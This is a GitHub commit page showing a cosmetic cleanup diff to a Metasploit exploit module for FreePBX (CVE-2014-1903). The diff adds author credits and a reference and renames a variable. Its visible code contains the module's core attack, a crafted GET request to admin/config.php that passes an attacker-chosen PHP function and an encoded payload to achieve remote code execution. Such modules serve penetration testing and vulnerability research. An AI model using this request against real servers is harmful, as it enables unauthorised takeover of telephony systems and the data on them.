Skip to content

Commit 4f333d8

Browse files
committed
Clean up code
1 parent c4f0d8e commit 4f333d8

File tree

1 file changed

+7
-5
lines changed

1 file changed

+7
-5
lines changed

modules/exploits/unix/webapp/freepbx_config_exec.rb

Lines changed: 7 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -21,12 +21,14 @@ def initialize(info={})
2121
'License' => MSF_LICENSE,
2222
'Author' =>
2323
[
24+
'i-Hmx', # Vulnerability discovery
2425
'0x00string', # PoC
2526
'xistence <xistence[at]0x90.nl>' # Metasploit module
2627
],
2728
'References' =>
2829
[
2930
['CVE', '2014-1903'],
31+
['OSVDB', '103240'],
3032
['EDB', '32214'],
3133
['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123']
3234
],
@@ -72,17 +74,17 @@ def check
7274
end
7375

7476
def exploit
75-
randdata = rand_text_alpha_lower(rand(10) + 5)
77+
rand_data = rand_text_alpha_lower(rand(10) + 5)
7678

7779
print_status("#{peer} - Sending payload")
7880
res = send_request_cgi({
7981
'method' => 'GET',
8082
'uri' => normalize_uri(target_uri.path, "admin", "config.php"),
8183
'vars_get' => {
82-
"display" => randdata,
83-
"handler" => "api",
84-
"function" => datastore['PHPFUNC'],
85-
"args" => payload.encoded
84+
"display" => rand_data,
85+
"handler" => "api",
86+
"function" => datastore['PHPFUNC'],
87+
"args" => payload.encoded
8688
}
8789
})
8890

0 commit comments

Comments
 (0)